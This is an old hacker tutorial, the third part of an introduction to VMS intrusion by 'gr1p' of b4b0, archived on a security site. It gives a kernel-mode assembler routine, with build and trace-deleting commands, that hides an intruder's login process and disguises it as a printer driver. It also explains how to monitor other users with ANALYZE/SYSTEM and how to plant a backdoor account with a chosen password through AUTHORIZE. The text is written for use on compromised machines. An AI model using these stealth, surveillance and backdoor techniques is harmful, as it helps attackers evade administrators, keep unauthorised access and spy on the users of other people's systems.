vms3.txt
c6d9d5802ff592b1c67ca81b664eca4260fa33683d911068735a74fff85a851aIntroduction to VMS - Part III.
gr1p@b4b0.org
Like I said, Part III would be here very soon, so we can continue the
introduction to VMS with this paper and move onto some more interesting
stuff later. In the last paper in this Introductionary series I covered
topics relating to gaining entry to the box, looking at user privileges
and how to gain more accounts etc. This paper is basically going to
carry on where Part II left off. I am going to demonstrate how to attempt
to make yourself invisible to other users in hope to keep access for as
long as possible etc. I will also outline possible ways to spy on users
and monitor system activity as well as adding system accounts.
--> Making yourself invisible
Most of the content in this section really comes down to common sense, and
the awareness that you must have for people around you on the machine.
For example, if you go around deleting users data, you are going to arouse
suspicion, and therefore increase the chances of you getting caught. The
idea is to keep access for as long as possible, therefore, the idea is to
cut out suspicious activity and play it safe.
There are many steps you must take to ensure that you are hid on the system,
i'll try to outline as many as I can..
The first thing to be done is to hide form the SHOW USER command, similar to
who in UNIX, which, when used allows anyone to see all the users on the
system. As you need to appear as a ghost on the system, you need to do
something to make you hidden when someone initiates the SHOW USER command.
Something a lot of people do is to make their login process a non-interactive
process which therefore means that your login doesn't show up when someone
uses the SHOW USER command, however, your login process would still be visible
if someone used the SHOW SYSTEM command. The way around that, which I was
originally shown, and still use due to its effeciency is to diguise your login
process as the process of a printer driver which shows up under the SHOW SYSTEM
command.
When you do a SHOW SYSTEM command at your DCL command prompt you will gain
all the information about the current system, process information, information
on drivers etc. You will notice names similar to the following driver names..
SYMBIONT_11, NETBIOS, CRON ,OPERATOR. etc.
Below is a short sample SHOW SYSTEM command table (not a complete table).
0000010A AUDIT_SERVER HIB 9 77 0 00:00:00.21 592 626
0000010B JOB_CONTROL HIB 9 418 0 00:00:00.77 239 378
0000010C QUEUE_MANAGER HIB 8 1936 0 00:00:07.75 1128 1514
0000010D SECURITY_SERVER HIB 10 102 0 00:00:00.65 1140 1344
00000126 AppleTalk ACP HIB 9 49 0 00:00:00.08 195 356
00000127 ATKGW$ACP HIB 9 53 0 00:00:00.04 131 220
00000128 MSAF$SERVER0 HIB 6 4750 0 00:00:07.42 1842 122
00000129 SYMBIONT_8 HIB 4 8 0 00:00:00.11 432 77
0000012A MSAP$RCVR0 HIB 6 31 0 00:00:00.24 982 666
0000012B SYMBIONT_9 HIB 4 8 0 00:00:00.14 453 92
0000012C MSAP$RCVR1 HIB 6 23 0 00:00:00.21 1021 561
0000012D MSAP$RCVR2 HIB 6 16 0 00:00:00.17 911 516
0000012E SYMBIONT_10 HIB 4 8 0 00:00:00.13 438 77
00000130 SYMBIONT_11 HIB 4 8 0 00:00:00.13 453 92
00000131 MSAP$RCVR4 HIB 6 23 0 00:00:00.19 1022 516
00000132 MSAP$RCVR5 HIB 6 37 0 00:00:00.13 1001 516
00000134 CRON HIB 6 458 0 00:00:01.91 339 406
0000015A GIT393 HIB 5 1810 0 00:00:01.02 1269 710
00000162 AEB477 HIB 6 4486 0 00:00:02.13 1861 717
00000165 MKR121 HIB 5 873 0 00:00:00.82 1383 732
You will notice from the SHOW SYSTEM command table above, and probably from
ones you find yourselves that they (probably) contain quite a few SYMBIONT_**
entries. These are Printer drivers, and if the machine is on a .edu subnet
the SHOW SYSTEM command table will probably contain quite a few entries of
printer drivers. This is a perfect place to hide your login process and
therefore become invisible on the system.
What I usually do is change my login process to appear as SYMBIONT_666 on
the SHOW SYSTEM table. This results in my login process appearing to be a
printer driver to anyone who uses the SHOW SYSTEM command. To use the above
SHOW SYSTEM table as an example, our username is MKR121, remember that! To
change your login process to the process of an extra printer driver you will
find below an assembler script that can be used on a VMS system. This script
is entitled stealth.mar, I have no knowledge who coded it originally.
-- snip --
.library /sys$library:lib.mlb/
.link /sys$system:sys.stb/
$pcbdef
.entry no_user,^m<>
$cmkrnl_s routin=blast_it
ret
.entry blast_it,^m<>
tstl pcb$l_owner(r4)
bneq outta_here
bbcc #pcb$v_inter,pcb$l_sts(r4),outta_here
clrb pcb$t_terminal(r4)
decw g^sys$gw_ijobcnt
bisl #pcb$m_noacnt,pcb$l_sts(r4)
outta_here:
movl #ss$_normal,r0
ret
.end no_user
-- snip --
To get this script onto the system firstly run the command.
$ create stealth.mar
Then put the code into the editor, once the code is entered hit ctrl-Z to
exit the create editor and return to the DCL prompt. Now that the stealth.mar
file is on the system, you need to assemble, link and run to become a hidden
login process. To do the above just follow the command lines below that will
then run the stealth.mar program and clean up afterwards.
$ macro stealth
$ link /nomap stealth
$ delete stealth.obj;*
$ delete stealth.mar;*
$ run stealth
$ del stealth.exe;*
Once you have done the following look at the show system table which will be
on you terminal. Look for the last SYMBIONT_** entry. eg. SYMBIONT_11 and
then add a few numbers onto that driver for use as your own "hidden login
process printer driver". I usually use SYMBIONT_666 but it is sensible to
use the number after the last printer driver entry on the list, in the
case I highlighted before, SYMBIONT_11 which would result in us hiding out
login process as SYMBIONT_12 by running the below command line.
$ set proc/name="SYMBIONT_12"
This will then rename your login process as SYMBIONT_12, a printer driver to
the normal eye, and therefore hiding you within the system as we can see
when we run the SHOW SYSTEM command once more..
0000010A AUDIT_SERVER HIB 9 77 0 00:00:00.21 592 626
0000010B JOB_CONTROL HIB 9 418 0 00:00:00.77 239 378
0000010C QUEUE_MANAGER HIB 8 1936 0 00:00:07.75 1128 1514
0000010D SECURITY_SERVER HIB 10 102 0 00:00:00.65 1140 1344
00000126 AppleTalk ACP HIB 9 49 0 00:00:00.08 195 356
00000127 ATKGW$ACP HIB 9 53 0 00:00:00.04 131 220
00000128 MSAF$SERVER0 HIB 6 4750 0 00:00:07.42 1842 122
00000129 SYMBIONT_8 HIB 4 8 0 00:00:00.11 432 77
0000012A MSAP$RCVR0 HIB 6 31 0 00:00:00.24 982 666
0000012B SYMBIONT_9 HIB 4 8 0 00:00:00.14 453 92
0000012C MSAP$RCVR1 HIB 6 23 0 00:00:00.21 1021 561
0000012D MSAP$RCVR2 HIB 6 16 0 00:00:00.17 911 516
0000012E SYMBIONT_10 HIB 4 8 0 00:00:00.13 438 77
00000130 SYMBIONT_11 HIB 4 8 0 00:00:00.13 453 92
00000131 MSAP$RCVR4 HIB 6 23 0 00:00:00.19 1022 516
00000132 MSAP$RCVR5 HIB 6 37 0 00:00:00.13 1001 516
00000134 CRON HIB 6 458 0 00:00:01.91 339 406
0000015A GIT393 HIB 5 1810 0 00:00:01.02 1269 710
00000162 AEB477 HIB 6 4486 0 00:00:02.13 1861 717
00000165 SYMBIONT_12 HIB 5 873 0 00:00:00.82 1383 732
Notice how SYMBIONT_12 has replaced the process that was once called MKR121
aka your login process, therefore you are now perfectly hidden from other users.
--> Monitoring Activity
There are many ways to monitor activity, from simply seeing who is logged
onto the box with the SHOW USER command to more indepth monitoring such as the
ANALYZE commands. If you have the CMKRNL privilege, which if you rememeber from
partII of this guide is the Kernel access mode and one of the most important
and powerful privileges on a VMS box, you can use the ANALYZE/SYSTEM command
which will give you an extremly detailed breakdown of what each user is doing on
the box. The ANALYZE command is the best command to examine the machine
further. You can monitor users system status, memory usage, file usage, what
they are accessing, etc. This command is the ultimate monitoring command in
VMS and should always be used if you have obtained the CMKRNL privilege.
Another ANALYZE command is the ANALYZE/AUDIT command which will load up the
Audit Analysis Utility which extracts information direct from the system
security audit journal which can be very useful information. Other ANALYZE
commands are as follows (bits taken from HELP)..
ANALYZE/DISK_STRUCTURE which is basically similar to the UNIX df command and
will display information about disk volumes on the machine.
ANALYZE/ERROR_LOG which will report the contents of the error_log file.
ANALYZE/IMAGE will describe the contents of an image file.
ANALYZE/OBJECT will describe the contents of an object modules.
As you can see from what I have described so far in this section the ANALYZE
command can give you a lot of information about your hacked system and its
users, _providing_ you have the CMKRNL privilege, its important to rememeber
that.
Another important command for looking at system activity, not so much
monitoring current activity, but looking at past activity is to use the SHOW
command. The SHOW command can however only really be used to monitor your
own account, but if it is an account that has been "stolen" then you will
still find out some interesting information here.
Some uses of the SHOW command are as follows (from HELP)..
SHOW/QUOTA will display your current disk quota on the boxes disk volume.
SHOW/DEFAULT will display the current default device and directory.
SHOW/ERROR will display the error count for all devices with error counts
above zero.
SHOW/WORKING_SET will display the working set limit, quota, and extent
assigned to the current process.
SHOW/ACCOUNTING will show which resources the current accounting file is
tracking.
As you can see from the above few commands, SHOW has some power to help you
gain information about your account, however, it is not as powerful as the
ANALYZE command.
--> Adding your own accounts
You may feel confident that you can get away with adding your own accounts
to a VMS box, and this is easily done with the following few command lines.
You need to use the AUTHORIZE program which is found in the sys$system
directory along with the password file and other use data, therefore to execute
AUTHORIZE you must firstly be in the correct command path.
$ sd sys$system
Next, run the autorize program.
$ run authorize
This will then present you with the following prompt, funnily enough called
a UAF prompt.
UAF>
UAF stands for User Authorization file and this is where you make your
modifications to make your new account. To add an account you finally need
to run the following command line at the UAF prompt.
UAF> add gr1p /password=t34mb4b0/priv=setprv
This add's the user gr1p with the password t34mb4b0 to the box. UAF add's
the data to both the sysuaf.dat file and the rightslist.dat file. The above
account was setup with the privilege setprv which is a very high privilege but
not really what we would called a "superuser" so it therefore doesn't look as
inconspicious as a superuser account. I take it most of you will know that
when dealing with a UNIX system, if you add a UID/GID 0 account to /etc/passwd
it will look _very_ conspicious. The same stands for a VMS box and high
privileged accounts.
That concludes my III-Part Introduction to VMS, you should now have the
basic knowledge needed to explore the world of VMS hacking, good luck. :)
I'd just like to say werd to Substance for always keeping 9x tight.
Remember, only you can do it bro. :>
Finally, as always, the links..
9x -> http://www2.dope.org/9x
b4b0 -> http://www.b4b0.org
Look out for more VMS related texts soon..
gr1p
gr1p@b4b0.org
http://www.b4b0.org/gr1p
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed